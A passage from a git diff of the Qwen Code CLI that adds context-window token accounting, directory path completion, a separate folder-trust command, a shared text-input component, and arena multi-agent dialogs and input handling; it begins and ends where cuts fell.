skillConfigs.map((skill) => { + const listingTokens = estimateTokens( + `\n\n${skill.name}\n\n\n${skill.description} (${skill.level})\n\n\n${skill.level}\n\n`, + ); + const isLoaded = loadedSkillNames.has(skill.name); + let bodyTokens: number | undefined; + if (isLoaded && skill.body) { + const baseDir = skill.filePath + ? skill.filePath.replace(/\/[^/]+$/, '') + : ''; + bodyTokens = estimateTokens(buildSkillLlmContent(baseDir, skill.body)); + loadedBodiesTokens += bodyTokens; + } + return { + name: skill.name, + tokens: listingTokens, + loaded: isLoaded, + bodyTokens, + }; + }); + + // Total skills cost = tool definition + loaded bodies + const skillsTokens = skillToolDefinitionTokens + loadedBodiesTokens; + + // 6. Autocompact buffer + const compressionThreshold = + config.getChatCompression()?.contextPercentageThreshold ?? + DEFAULT_COMPRESSION_THRESHOLD; + const autocompactBuffer = + compressionThreshold > 0 + ? Math.round((1 - compressionThreshold) * contextWindowSize) + : 0; + + // 7. Calculate raw overhead + // allToolsTokens includes the skill tool definition; loadedBodiesTokens + // covers the on-demand skill bodies now attributed to Skills. + const rawOverhead = + systemPromptTokens + + allToolsTokens + + memoryFilesTokens + + loadedBodiesTokens; + + // 8. Determine total tokens and build breakdown + const isEstimated = apiTotalTokens === 0; + + // Sum of MCP tool tokens for category-level display + const mcpToolsTotalTokens = mcpTools.reduce( + (sum, tool) => sum + tool.tokens, + 0, + ); + + let totalTokens: number; + let displaySystemPrompt: number; + let displayBuiltinTools: number; + let displayMcpTools: number; + let displayMemoryFiles: number; + let displaySkills: number; + let messagesTokens: number; + let freeSpace: number; + let detailBuiltinTools: ContextToolDetail[]; + let detailMcpTools: ContextToolDetail[]; + let detailMemoryFiles: ContextMemoryDetail[]; + let detailSkills: ContextSkillDetail[]; + + if (isEstimated) { + // No API data yet: show raw overhead estimates only. + // Use 0 as totalTokens so the progress bar stays empty — + // avoids showing an inflated estimate that would "decrease" + // once real API data arrives. + totalTokens = 0; + displaySystemPrompt = systemPromptTokens; + // Skills = tool definition + loaded bodies + displaySkills = skillsTokens; + // builtinTools = allTools minus skills-definition minus mcpTools + displayBuiltinTools = Math.max( + 0, + allToolsTokens - skillToolDefinitionTokens - mcpToolsTotalTokens, + ); + displayMcpTools = mcpToolsTotalTokens; + displayMemoryFiles = memoryFilesTokens; + messagesTokens = 0; + // Free space accounts for the estimated overhead + freeSpace = Math.max( + 0, + contextWindowSize - rawOverhead - autocompactBuffer, + ); + detailBuiltinTools = builtinTools; + detailMcpTools = mcpTools; + detailMemoryFiles = memoryFiles; + detailSkills = skills; + } else { + // API data available: use actual total with proportional scaling + totalTokens = apiTotalTokens; + + // When estimates overshoot API total, scale down proportionally + // so the breakdown categories add up to totalTokens. + const overheadScale = + rawOverhead > totalTokens ? totalTokens / rawOverhead : 1; + + displaySystemPrompt = Math.round(systemPromptTokens * overheadScale); + const scaledAllTools = Math.round(allToolsTokens * overheadScale); + displayMemoryFiles = Math.round(memoryFilesTokens * overheadScale); + // Skills = tool definition + loaded bodies (scaled together) + displaySkills = Math.round(skillsTokens * overheadScale); + const scaledMcpTotal = Math.round(mcpToolsTotalTokens * overheadScale); + displayMcpTools = scaledMcpTotal; + // builtinTools = allTools minus skill-definition minus mcpTools + const scaledSkillDefinition = Math.round( + skillToolDefinitionTokens * overheadScale, + ); + displayBuiltinTools = Math.max( + 0, + scaledAllTools - scaledSkillDefinition - scaledMcpTotal, + ); + + const scaledOverhead = + displaySystemPrompt + + scaledAllTools + + displayMemoryFiles + + Math.round(loadedBodiesTokens * overheadScale); + + // When the API reports cached content tokens (e.g. DashScope prefix caching), + // use them as the actual overhead indicator for a more accurate messages count. + // cachedTokens ≈ system prompt + tools tokens actually served from cache. + // This avoids the "messages = 0" problem caused by estimation overshoot. + if (apiCachedTokens > 0) { + messagesTokens = Math.max(0, totalTokens - apiCachedTokens); + } else { + messagesTokens = Math.max(0, totalTokens - scaledOverhead); + } + + freeSpace = Math.max( + 0, + contextWindowSize - totalTokens - autocompactBuffer, + ); + + // Scale detail items to match their parent categories + const scaleDetail = (items: T[]): T[] => + overheadScale < 1 + ? items.map((item) => ({ + ...item, + tokens: Math.round(item.tokens * overheadScale), + })) + : items; + + detailBuiltinTools = scaleDetail(builtinTools); + detailMcpTools = scaleDetail(mcpTools); + detailMemoryFiles = scaleDetail(memoryFiles); + detailSkills = + overheadScale < 1 + ? skills.map((item) => ({ + ...item, + tokens: Math.round(item.tokens * overheadScale), + bodyTokens: item.bodyTokens + ? Math.round(item.bodyTokens * overheadScale) + : undefined, + })) + : skills; + } + + const breakdown: ContextCategoryBreakdown = { + systemPrompt: displaySystemPrompt, + builtinTools: displayBuiltinTools, + mcpTools: displayMcpTools, + memoryFiles: displayMemoryFiles, + skills: displaySkills, + messages: messagesTokens, + freeSpace, + autocompactBuffer, + }; + + const contextUsageItem: HistoryItemContextUsage = { + type: MessageType.CONTEXT_USAGE, + modelName, + totalTokens, + contextWindowSize, + breakdown, + builtinTools: detailBuiltinTools, + mcpTools: detailMcpTools, + memoryFiles: detailMemoryFiles, + skills: detailSkills, + isEstimated, + showDetails, + }; + + context.ui.addItem(contextUsageItem, Date.now()); + }, +}; diff --git a/packages/cli/src/ui/commands/directoryCommand.tsx b/packages/cli/src/ui/commands/directoryCommand.tsx index 1fcd83dd3..ca57ad10d 100644 --- a/packages/cli/src/ui/commands/directoryCommand.tsx +++ b/packages/cli/src/ui/commands/directoryCommand.tsx @@ -7,6 +7,7 @@ import type { SlashCommand, CommandContext } from './types.js'; import { CommandKind } from './types.js'; import { MessageType } from '../types.js'; +import * as fs from 'node:fs'; import * as os from 'node:os'; import * as path from 'node:path'; import { loadServerHierarchicalMemory } from '@qwen-code/qwen-code-core'; @@ -25,6 +26,44 @@ export function expandHomeDir(p: string): string { return path.normalize(expandedPath); } +/** + * Returns directory path completions for the given partial argument. + * Supports comma-separated paths by completing only the last segment. + */ +export function getDirPathCompletions(partialArg: string): string[] { + const lastComma = partialArg.lastIndexOf(','); + const prefix = lastComma >= 0 ? partialArg.substring(0, lastComma + 1) : ''; + const partial = + lastComma >= 0 + ? partialArg.substring(lastComma + 1).trimStart() + : partialArg; + + const trimmed = partial.trim(); + if (!trimmed) return []; + + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const endsWithSep = expanded.endsWith('/') || expanded.endsWith(path.sep); + const searchDir = endsWithSep ? expanded : path.dirname(expanded); + const namePrefix = endsWithSep ? '' : path.basename(expanded); + + try { + return fs + .readdirSync(searchDir, { withFileTypes: true }) + .filter( + (e) => + e.isDirectory() && + e.name.startsWith(namePrefix) && + !e.name.startsWith('.'), + ) + .map((e) => prefix + path.join(searchDir, e.name)) + .slice(0, 8); + } catch { + return []; + } +} + export const directoryCommand: SlashCommand = { name: 'directory', altNames: ['dir'], @@ -41,6 +80,8 @@ export const directoryCommand: SlashCommand = { ); }, kind: CommandKind.BUILT_IN, + completion: async (_context: CommandContext, partialArg: string) => + getDirPathCompletions(partialArg), action: async (context: CommandContext, args: string) => { const { ui: { addItem }, diff --git a/packages/cli/src/ui/commands/exportCommand.ts b/packages/cli/src/ui/commands/exportCommand.ts index 8edec9f4d..755a7061e 100644 --- a/packages/cli/src/ui/commands/exportCommand.ts +++ b/packages/cli/src/ui/commands/exportCommand.ts @@ -22,6 +22,7 @@ import { toJsonl, generateExportFilename, } from '../utils/export/index.js'; +import { t } from '../../i18n/index.js'; /** * Action for the 'md' subcommand - exports session to markdown. @@ -320,30 +321,40 @@ async function exportJsonlAction( */ export const exportCommand: SlashCommand = { name: 'export', - description: 'Export current session message history to a file', + get description() { + return t('Export current session message history to a file'); + }, kind: CommandKind.BUILT_IN, subCommands: [ { name: 'html', - description: 'Export session to HTML format', + get description() { + return t('Export session to HTML format'); + }, kind: CommandKind.BUILT_IN, action: exportHtmlAction, }, { name: 'md', - description: 'Export session to markdown format', + get description() { + return t('Export session to markdown format'); + }, kind: CommandKind.BUILT_IN, action: exportMarkdownAction, }, { name: 'json', - description: 'Export session to JSON format', + get description() { + return t('Export session to JSON format'); + }, kind: CommandKind.BUILT_IN, action: exportJsonAction, }, { name: 'jsonl', - description: 'Export session to JSONL format (one message per line)', + get description() { + return t('Export session to JSONL format (one message per line)'); + }, kind: CommandKind.BUILT_IN, action: exportJsonlAction, }, diff --git a/packages/cli/src/ui/commands/permissionsCommand.test.ts b/packages/cli/src/ui/commands/permissionsCommand.test.ts index f51e7c3df..b42e546f6 100644 --- a/packages/cli/src/ui/commands/permissionsCommand.test.ts +++ b/packages/cli/src/ui/commands/permissionsCommand.test.ts @@ -18,7 +18,7 @@ describe('permissionsCommand', () => { it('should have the correct name and description', () => { expect(permissionsCommand.name).toBe('permissions'); - expect(permissionsCommand.description).toBe('Manage folder trust settings'); + expect(permissionsCommand.description).toBe('Manage permission rules'); }); it('should be a built-in command', () => { diff --git a/packages/cli/src/ui/commands/permissionsCommand.ts b/packages/cli/src/ui/commands/permissionsCommand.ts index 2b6a7c344..034fec843 100644 --- a/packages/cli/src/ui/commands/permissionsCommand.ts +++ b/packages/cli/src/ui/commands/permissionsCommand.ts @@ -11,7 +11,7 @@ import { t } from '../../i18n/index.js'; export const permissionsCommand: SlashCommand = { name: 'permissions', get description() { - return t('Manage folder trust settings'); + return t('Manage permission rules'); }, kind: CommandKind.BUILT_IN, action: (): OpenDialogActionReturn => ({ diff --git a/packages/cli/src/ui/commands/restoreCommand.ts b/packages/cli/src/ui/commands/restoreCommand.ts index fce633275..72d83c5aa 100644 --- a/packages/cli/src/ui/commands/restoreCommand.ts +++ b/packages/cli/src/ui/commands/restoreCommand.ts @@ -13,6 +13,7 @@ import { CommandKind, } from './types.js'; import type { Config } from '@qwen-code/qwen-code-core'; +import { t } from '../../i18n/index.js'; async function restoreAction( context: CommandContext, @@ -144,8 +145,11 @@ export const restoreCommand = (config: Config | null): SlashCommand | null => { return { name: 'restore', - description: - 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested', + get description() { + return t( + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested', + ); + }, kind: CommandKind.BUILT_IN, action: restoreAction, completion, diff --git a/packages/cli/src/ui/commands/trustCommand.test.ts b/packages/cli/src/ui/commands/trustCommand.test.ts new file mode 100644 index 000000000..dff3e5750 --- /dev/null +++ b/packages/cli/src/ui/commands/trustCommand.test.ts @@ -0,0 +1,35 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach } from 'vitest'; +import { trustCommand } from './trustCommand.js'; +import { type CommandContext, CommandKind } from './types.js'; +import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; + +describe('trustCommand', () => { + let mockContext: CommandContext; + + beforeEach(() => { + mockContext = createMockCommandContext(); + }); + + it('should have the correct name and description', () => { + expect(trustCommand.name).toBe('trust'); + expect(trustCommand.description).toBe('Manage folder trust settings'); + }); + + it('should be a built-in command', () => { + expect(trustCommand.kind).toBe(CommandKind.BUILT_IN); + }); + + it('should return an action to open the trust dialog', () => { + const actionResult = trustCommand.action?.(mockContext, ''); + expect(actionResult).toEqual({ + type: 'dialog', + dialog: 'trust', + }); + }); +}); diff --git a/packages/cli/src/ui/commands/trustCommand.ts b/packages/cli/src/ui/commands/trustCommand.ts new file mode 100644 index 000000000..9fa566db2 --- /dev/null +++ b/packages/cli/src/ui/commands/trustCommand.ts @@ -0,0 +1,21 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { OpenDialogActionReturn, SlashCommand } from './types.js'; +import { CommandKind } from './types.js'; +import { t } from '../../i18n/index.js'; + +export const trustCommand: SlashCommand = { + name: 'trust', + get description() { + return t('Manage folder trust settings'); + }, + kind: CommandKind.BUILT_IN, + action: (): OpenDialogActionReturn => ({ + type: 'dialog', + dialog: 'trust', + }), +}; diff --git a/packages/cli/src/ui/commands/types.ts b/packages/cli/src/ui/commands/types.ts index 3fe41647b..d74f3e393 100644 --- a/packages/cli/src/ui/commands/types.ts +++ b/packages/cli/src/ui/commands/types.ts @@ -148,6 +148,10 @@ export interface OpenDialogActionReturn { dialog: | 'help' + | 'arena_start' + | 'arena_select' + | 'arena_stop' + | 'arena_status' | 'auth' | 'theme' | 'editor' @@ -155,6 +159,7 @@ export interface OpenDialogActionReturn { | 'model' | 'subagent_create' | 'subagent_list' + | 'trust' | 'permissions' | 'approval-mode' | 'resume' diff --git a/packages/cli/src/ui/components/BaseTextInput.tsx b/packages/cli/src/ui/components/BaseTextInput.tsx new file mode 100644 index 000000000..07eb1a693 --- /dev/null +++ b/packages/cli/src/ui/components/BaseTextInput.tsx @@ -0,0 +1,287 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview BaseTextInput — shared text input component with rendering + * and common readline keyboard handling. + * + * Provides: + * - Viewport line rendering from a TextBuffer with cursor display + * - Placeholder support when buffer is empty + * - Configurable border/prefix styling + * - Standard readline shortcuts (Ctrl+A/E/K/U/W, Escape, etc.) + * - An `onKeypress` interceptor so consumers can layer custom behavior + * + * Used by both InputPrompt (with syntax highlighting + complex key handling) + * and AgentComposer (with minimal customization). + */ + +import type React from 'react'; +import { useCallback } from 'react'; +import { Box, Text } from 'ink'; +import chalk from 'chalk'; +import type { TextBuffer } from './shared/text-buffer.js'; +import type { Key } from '../hooks/useKeypress.js'; +import { useKeypress } from '../hooks/useKeypress.js'; +import { keyMatchers, Command } from '../keyMatchers.js'; +import { cpSlice, cpLen } from '../utils/textUtils.js'; +import { theme } from '../semantic-colors.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface RenderLineOptions { + /** The text content of this visual line. */ + lineText: string; + /** Whether the cursor is on this visual line. */ + isOnCursorLine: boolean; + /** The cursor column within this visual line (visual col, not logical). */ + cursorCol: number; + /** Whether the cursor should be rendered. */ + showCursor: boolean; + /** Index of this line within the rendered viewport (0-based). */ + visualLineIndex: number; + /** Absolute visual line index (scrollVisualRow + visualLineIndex). */ + absoluteVisualIndex: number; + /** The underlying text buffer. */ + buffer: TextBuffer; + /** The first visible visual row (scroll offset). */ + scrollVisualRow: number; +} + +export interface BaseTextInputProps { + /** The text buffer driving this input. */ + buffer: TextBuffer; + /** Called when the user submits (Enter). Buffer is cleared automatically. */ + onSubmit: (text: string) => void; + /** + * Optional key interceptor. Called before default readline handling. + * Return `true` if the key was handled (skips default processing). + */ + onKeypress?: (key: Key) => boolean; + /** Whether to show the blinking block cursor. Defaults to true. */ + showCursor?: boolean; + /** Placeholder text shown when the buffer is empty. */ + placeholder?: string; + /** Custom prefix node (defaults to `> `). */ + prefix?: React.ReactNode; + /** Border color for the input box. */ + borderColor?: string; + /** Whether keyboard handling is active. Defaults to true. */ + isActive?: boolean; + /** + * Custom line renderer for advanced rendering (e.g. syntax highlighting). + * When not provided, lines are rendered as plain text with cursor overlay. + */ + renderLine?: (opts: RenderLineOptions) => React.ReactNode; +} + +// ─── Default line renderer ────────────────────────────────── + +/** + * Renders a single visual line with an inverse-video block cursor. + * Uses codepoint-aware string operations for Unicode/emoji safety. + */ +export function defaultRenderLine({ + lineText, + isOnCursorLine, + cursorCol, + showCursor, +}: RenderLineOptions): React.ReactNode { + if (!isOnCursorLine || !showCursor) { + return {lineText || ' '}; + } + + const len = cpLen(lineText); + + // Cursor past end of line — append inverse space + if (cursorCol >= len) { + return ( + + {lineText} + {chalk.inverse(' ') + '\u200B'} + + ); + } + + const before = cpSlice(lineText, 0, cursorCol); + const cursorChar = cpSlice(lineText, cursorCol, cursorCol + 1); + const after = cpSlice(lineText, cursorCol + 1); + + return ( + + {before} + {chalk.inverse(cursorChar)} + {after} + + ); +} + +// ─── Component ────────────────────────────────────────────── + +export const BaseTextInput: React.FC = ({ + buffer, + onSubmit, + onKeypress, + showCursor = true, + placeholder, + prefix, + borderColor, + isActive = true, + renderLine = defaultRenderLine, +}) => { + // ── Keyboard handling ── + + const handleKey = useCallback( + (key: Key) => { + // Let the consumer intercept first + if (onKeypress?.(key)) { + return; + } + + // ── Standard readline shortcuts ── + + // Submit (Enter, no modifiers) + if (keyMatchers[Command.SUBMIT](key)) { + if (buffer.text.trim()) { + const text = buffer.text; + buffer.setText(''); + onSubmit(text); + } + return; + } + + // Newline (Shift+Enter, Ctrl+Enter, Ctrl+J) + if (keyMatchers[Command.NEWLINE](key)) { + buffer.newline(); + return; + } + + // Escape → clear input + if (keyMatchers[Command.ESCAPE](key)) { + if (buffer.text.length > 0) { + buffer.setText(''); + } + return; + } + + // Ctrl+C → clear input + if (keyMatchers[Command.CLEAR_INPUT](key)) { + if (buffer.text.length > 0) { + buffer.setText(''); + } + return; + } + + // Ctrl+A → home + if (keyMatchers[Command.HOME](key)) { + buffer.move('home'); + return; + } + + // Ctrl+E → end + if (keyMatchers[Command.END](key)) { + buffer.move('end'); + return; + } + + // Ctrl+K → kill to end of line + if (keyMatchers[Command.KILL_LINE_RIGHT](key)) { + buffer.killLineRight(); + return; + } + + // Ctrl+U → kill to start of line + if (keyMatchers[Command.KILL_LINE_LEFT](key)) { + buffer.killLineLeft(); + return; + } + + // Ctrl+W / Alt+Backspace → delete word backward + if (keyMatchers[Command.DELETE_WORD_BACKWARD](key)) { + buffer.deleteWordLeft(); + return; + } + + // Ctrl+X Ctrl+E → open in external editor + if (keyMatchers[Command.OPEN_EXTERNAL_EDITOR](key)) { + buffer.openInExternalEditor(); + return; + } + + // Backspace + if ( + key.name === 'backspace' || + key.sequence === '\x7f' || + (key.ctrl && key.name === 'h') + ) { + buffer.backspace(); + return; + } + + // Fallthrough — delegate to buffer's built-in input handler + buffer.handleInput(key); + }, + [buffer, onSubmit, onKeypress], + ); + + useKeypress(handleKey, { isActive }); + + // ── Rendering ── + + const linesToRender = buffer.viewportVisualLines; + const [cursorVisualRow, cursorVisualCol] = buffer.visualCursor; + const scrollVisualRow = buffer.visualScrollRow; + + const resolvedBorderColor = borderColor ?? theme.border.focused; + const resolvedPrefix = prefix ?? ( + {'> '} + ); + + return ( + + {resolvedPrefix} + + {buffer.text.length === 0 && placeholder ? ( + showCursor ? ( + + {chalk.inverse(placeholder.slice(0, 1))} + {placeholder.slice(1)} + + ) : ( + {placeholder} + ) + ) : ( + linesToRender.map((lineText, idx) => { + const absoluteVisualIndex = scrollVisualRow + idx; + const isOnCursorLine = absoluteVisualIndex === cursorVisualRow; + + return ( + + {renderLine({ + lineText, + isOnCursorLine, + cursorCol: cursorVisualCol, + showCursor, + visualLineIndex: idx, + absoluteVisualIndex, + buffer, + scrollVisualRow, + })} + + ); + }) + )} + + + ); +}; diff --git a/packages/cli/src/ui/components/Composer.test.tsx b/packages/cli/src/ui/components/Composer.test.tsx index 67d992dbe..5d969de5c 100644 --- a/packages/cli/src/ui/components/Composer.test.tsx +++ b/packages/cli/src/ui/components/Composer.test.tsx @@ -111,6 +111,7 @@ const createMockUIState = (overrides: Partial = {}): UIState => debugMessage: '', nightly: false, isTrustedFolder: true, + taskStartTokens: 0, ...overrides, }) as UIState; diff --git a/packages/cli/src/ui/components/Composer.tsx b/packages/cli/src/ui/components/Composer.tsx index 193549245..530b57046 100644 --- a/packages/cli/src/ui/components/Composer.tsx +++ b/packages/cli/src/ui/components/Composer.tsx @@ -27,7 +27,17 @@ export const Composer = () => { const uiActions = useUIActions(); const { vimEnabled } = useVimMode(); - const { showAutoAcceptIndicator } = uiState; + const { showAutoAcceptIndicator, sessionStats, taskStartTokens } = uiState; + + const tokens = Object.values(sessionStats.metrics?.models ?? {}).reduce( + (acc, model) => ({ + prompt: acc.prompt + (model.tokens?.prompt ?? 0), + candidates: acc.candidates + (model.tokens?.candidates ?? 0), + }), + { prompt: 0, candidates: 0 }, + ); + + const taskTokens = tokens.candidates - taskStartTokens; // State for keyboard shortcuts display toggle const [showShortcuts, setShowShortcuts] = useState(false); @@ -64,6 +74,7 @@ export const Composer = () => { : uiState.currentLoadingPhrase } elapsedTime={uiState.elapsedTime} + candidatesTokens={taskTokens} /> )} @@ -104,8 +115,8 @@ export const Composer = () => { {/* Exclusive area: only one component visible at a time */} {/* Hide footer when a confirmation dialog (e.g. ask_user_question) is active */} - {!showSuggestions && - uiState.streamingState !== StreamingState.WaitingForConfirmation && + {uiState.isInputActive && + !showSuggestions && (showShortcuts ? ( ) : ( diff --git a/packages/cli/src/ui/components/DialogManager.tsx b/packages/cli/src/ui/components/DialogManager.tsx index 26390e270..2e5fae0c8 100644 --- a/packages/cli/src/ui/components/DialogManager.tsx +++ b/packages/cli/src/ui/components/DialogManager.tsx @@ -18,8 +18,13 @@ import { SettingsDialog } from './SettingsDialog.js'; import { QwenOAuthProgress } from './QwenOAuthProgress.js'; import { AuthDialog } from '../auth/AuthDialog.js'; import { EditorSettingsDialog } from './EditorSettingsDialog.js'; -import { PermissionsModifyTrustDialog } from './PermissionsModifyTrustDialog.js'; +import { TrustDialog } from './TrustDialog.js'; +import { PermissionsDialog } from './PermissionsDialog.js'; import { ModelDialog } from './ModelDialog.js'; +import { ArenaStartDialog } from './arena/ArenaStartDialog.js'; +import { ArenaSelectDialog } from './arena/ArenaSelectDialog.js'; +import { ArenaStopDialog } from './arena/ArenaStopDialog.js'; +import { ArenaStatusDialog } from './arena/ArenaStatusDialog.js'; import { ApprovalModeDialog } from './ApprovalModeDialog.js'; import { theme } from '../semantic-colors.js'; import { useUIState } from '../contexts/UIStateContext.js'; @@ -237,6 +242,49 @@ export const DialogManager = ({ if (uiState.isModelDialogOpen) { return ; } + if (uiState.activeArenaDialog === 'start') { + return ( + uiActions.closeArenaDialog()} + onConfirm={(models) => uiActions.handleArenaModelsSelected?.(models)} + /> + ); + } + if (uiState.activeArenaDialog === 'status') { + const arenaManager = config.getArenaManager(); + if (arenaManager) { + return ( + + ); + } + } + if (uiState.activeArenaDialog === 'stop') { + return ( + + ); + } + if (uiState.activeArenaDialog === 'select') { + const arenaManager = config.getArenaManager(); + if (arenaManager) { + return ( + + ); + } + } + if (uiState.isAuthDialogOpen || uiState.authError) { return ( @@ -267,15 +315,16 @@ export const DialogManager = ({ ); } } - if (uiState.isPermissionsDialogOpen) { + if (uiState.isTrustDialogOpen) { return ( - + ); } + if (uiState.isPermissionsDialogOpen) { + return ; + } + if (uiState.isSubagentCreateDialogOpen) { return ( = ({ {itemForDisplay.type === 'info' && ( )} + {itemForDisplay.type === 'success' && ( + + )} {itemForDisplay.type === 'warning' && ( )} @@ -192,6 +198,32 @@ const HistoryItemDisplayComponent: React.FC = ({ {itemForDisplay.type === 'mcp_status' && ( )} + {itemForDisplay.type === 'context_usage' && ( + + )} + {itemForDisplay.type === 'arena_agent_complete' && ( + + )} + {itemForDisplay.type === 'arena_session_complete' && ( + + )} {itemForDisplay.type === 'insight_progress' && ( )} diff --git a/packages/cli/src/ui/components/InputPrompt.test.tsx b/packages/cli/src/ui/components/InputPrompt.test.tsx index 61584b8c7..347a1e918 100644 --- a/packages/cli/src/ui/components/InputPrompt.test.tsx +++ b/packages/cli/src/ui/components/InputPrompt.test.tsx @@ -1957,6 +1957,25 @@ describe('InputPrompt', () => { }); describe('command search (Ctrl+R when not in shell)', () => { + it('passes newest-first user history to command search', async () => { + props.shellModeActive = false; + props.userMessages = ['oldest', 'middle', 'newest']; + + const { unmount } = renderWithProviders(); + await wait(); + + const commandSearchCall = + mockedUseReverseSearchCompletion.mock.calls.find( + ([, history]) => + Array.isArray(history) && + history.length === 3 && + history.includes('newest'), + ); + + expect(commandSearchCall?.[1]).toEqual(['newest', 'middle', 'oldest']); + unmount(); + }); + it('enters command search on Ctrl+R and shows suggestions', async () => { props.shellModeActive = false; diff --git a/packages/cli/src/ui/components/InputPrompt.tsx b/packages/cli/src/ui/components/InputPrompt.tsx index 42ec7efbb..52add983b 100644 --- a/packages/cli/src/ui/components/InputPrompt.tsx +++ b/packages/cli/src/ui/components/InputPrompt.tsx @@ -5,7 +5,7 @@ */ import type React from 'react'; -import { useCallback, useEffect, useState, useRef } from 'react'; +import { useCallback, useEffect, useMemo, useState, useRef } from 'react'; import { Box, Text } from 'ink'; import { SuggestionsDisplay, MAX_WIDTH } from './SuggestionsDisplay.js'; import { theme } from '../semantic-colors.js'; @@ -18,7 +18,6 @@ import { useShellHistory } from '../hooks/useShellHistory.js'; import { useReverseSearchCompletion } from '../hooks/useReverseSearchCompletion.js'; import { useCommandCompletion } from '../hooks/useCommandCompletion.js'; import type { Key } from '../hooks/useKeypress.js'; -import { useKeypress } from '../hooks/useKeypress.js'; import { keyMatchers, Command } from '../keyMatchers.js'; import type { CommandContext, SlashCommand } from '../commands/types.js'; import type { Config } from '@qwen-code/qwen-code-core'; @@ -43,7 +42,13 @@ import { useShellFocusState } from '../contexts/ShellFocusContext.js'; import { useUIState } from '../contexts/UIStateContext.js'; import { useUIActions } from '../contexts/UIActionsContext.js'; import { useKeypressContext } from '../contexts/KeypressContext.js'; +import { + useAgentViewState, + useAgentViewActions, +} from '../contexts/AgentViewContext.js'; import { FEEDBACK_DIALOG_KEYS } from '../FeedbackDialog.js'; +import { BaseTextInput } from './BaseTextInput.js'; +import type { RenderLineOptions } from './BaseTextInput.js'; /** * Represents an attachment (e.g., pasted image) displayed above the input prompt @@ -78,30 +83,8 @@ export interface InputPromptProps { isEmbeddedShellFocused?: boolean; } -// The input content, input container, and input suggestions list may have different widths -export const calculatePromptWidths = (terminalWidth: number) => { - const widthFraction = 0.9; - const FRAME_PADDING_AND_BORDER = 4; // Border (2) + padding (2) - const PROMPT_PREFIX_WIDTH = 2; // '> ' or '! ' - const MIN_CONTENT_WIDTH = 2; - - const innerContentWidth = - Math.floor(terminalWidth * widthFraction) - - FRAME_PADDING_AND_BORDER - - PROMPT_PREFIX_WIDTH; - - const inputWidth = Math.max(MIN_CONTENT_WIDTH, innerContentWidth); - const FRAME_OVERHEAD = FRAME_PADDING_AND_BORDER + PROMPT_PREFIX_WIDTH; - const containerWidth = inputWidth + FRAME_OVERHEAD; - const suggestionsWidth = Math.max(20, Math.floor(terminalWidth * 1.0)); - - return { - inputWidth, - containerWidth, - suggestionsWidth, - frameOverhead: FRAME_OVERHEAD, - } as const; -}; +// Re-export from shared utils for backwards compatibility +export { calculatePromptWidths } from '../utils/layoutUtils.js'; // Large paste placeholder thresholds const LARGE_PASTE_CHAR_THRESHOLD = 1000; @@ -132,6 +115,9 @@ export const InputPrompt: React.FC = ({ const uiState = useUIState(); const uiActions = useUIActions(); const { pasteWorkaround } = useKeypressContext(); + const { agents, agentTabBarFocused } = useAgentViewState(); + const { setAgentTabBarFocused } = useAgentViewActions(); + const hasAgents = agents.size > 0; const [justNavigatedHistory, setJustNavigatedHistory] = useState(false); const [escPressCount, setEscPressCount] = useState(0); const [showEscapePrompt, setShowEscapePrompt] = useState(false); @@ -213,9 +199,14 @@ export const InputPrompt: React.FC = ({ reverseSearchActive, ); + const commandSearchHistory = useMemo( + () => [...userMessages].reverse(), + [userMessages], + ); + const commandSearchCompletion = useReverseSearchCompletion( buffer, - userMessages, + commandSearchHistory, commandSearchActive, ); @@ -225,7 +216,8 @@ export const InputPrompt: React.FC = ({ const resetCommandSearchCompletionState = commandSearchCompletion.resetCompletionState; - const showCursor = focus && isShellFocused && !isEmbeddedShellFocused; + const showCursor = + focus && isShellFocused && !isEmbeddedShellFocused && !agentTabBarFocused; const resetEscapeState = useCallback(() => { if (escapeTimerRef.current) { @@ -351,6 +343,17 @@ export const InputPrompt: React.FC = ({ onChange: customSetTextAndResetCompletionSignal, }); + // When an arena session starts (agents appear), reset history position so + // that pressing down-arrow immediately focuses the agent tab bar instead + // of cycling through input history. + const prevHasAgentsRef = useRef(hasAgents); + useEffect(() => { + if (hasAgents && !prevHasAgentsRef.current) { + inputHistory.resetHistoryNav(); + } + prevHasAgentsRef.current = hasAgents; + }, [hasAgents, inputHistory]); + // Effect to reset completion if history navigation just occurred and set the text useEffect(() => { if (justNavigatedHistory) { @@ -411,13 +414,30 @@ export const InputPrompt: React.FC = ({ }, []); const handleInput = useCallback( - (key: Key) => { + (key: Key): boolean => { + // When the tab bar has focus, block all non-printable keys so arrow + // keys and shortcuts don't interfere. Printable characters fall + // through to BaseTextInput's default handler so the first keystroke + // appears in the input immediately (the tab bar handler releases + // focus on the same event). + if (agentTabBarFocused) { + if ( + key.sequence && + key.sequence.length === 1 && + !key.ctrl && + !key.meta + ) { + return false; // let BaseTextInput type the character + } + return true; // consume non-printable keys + } + // TODO(jacobr): this special case is likely not needed anymore. // We should probably stop supporting paste if the InputPrompt is not // focused. /// We want to handle paste even when not focused to support drag and drop. if (!focus && !key.paste) { - return; + return true; } if (key.paste) { @@ -459,18 +479,18 @@ export const InputPrompt: React.FC = ({ // Normal paste handling for small content buffer.handleInput(key); } - return; + return true; } if (vimHandleInput && vimHandleInput(key)) { - return; + return true; } // Handle feedback dialog keyboard interactions when dialog is open if (uiState.isFeedbackDialogOpen) { // If it's one of the feedback option keys (1-4), let FeedbackDialog handle it if ((FEEDBACK_DIALOG_KEYS as readonly string[]).includes(key.name)) { - return; + return true; } else { // For any other key, close feedback dialog temporarily and continue with normal processing uiActions.temporaryCloseFeedbackDialog(); @@ -496,7 +516,7 @@ export const InputPrompt: React.FC = ({ } setShellModeActive(!shellModeActive); buffer.setText(''); // Clear the '!' from input - return; + return true; } // Toggle keyboard shortcuts display with "?" when buffer is empty @@ -507,7 +527,7 @@ export const InputPrompt: React.FC = ({ onToggleShortcuts ) { onToggleShortcuts(); - return; + return true; } // Hide shortcuts on any other key press @@ -537,33 +557,33 @@ export const InputPrompt: React.FC = ({ setReverseSearchActive, reverseSearchCompletion.resetCompletionState, ); - return; + return true; } if (commandSearchActive) { cancelSearch( 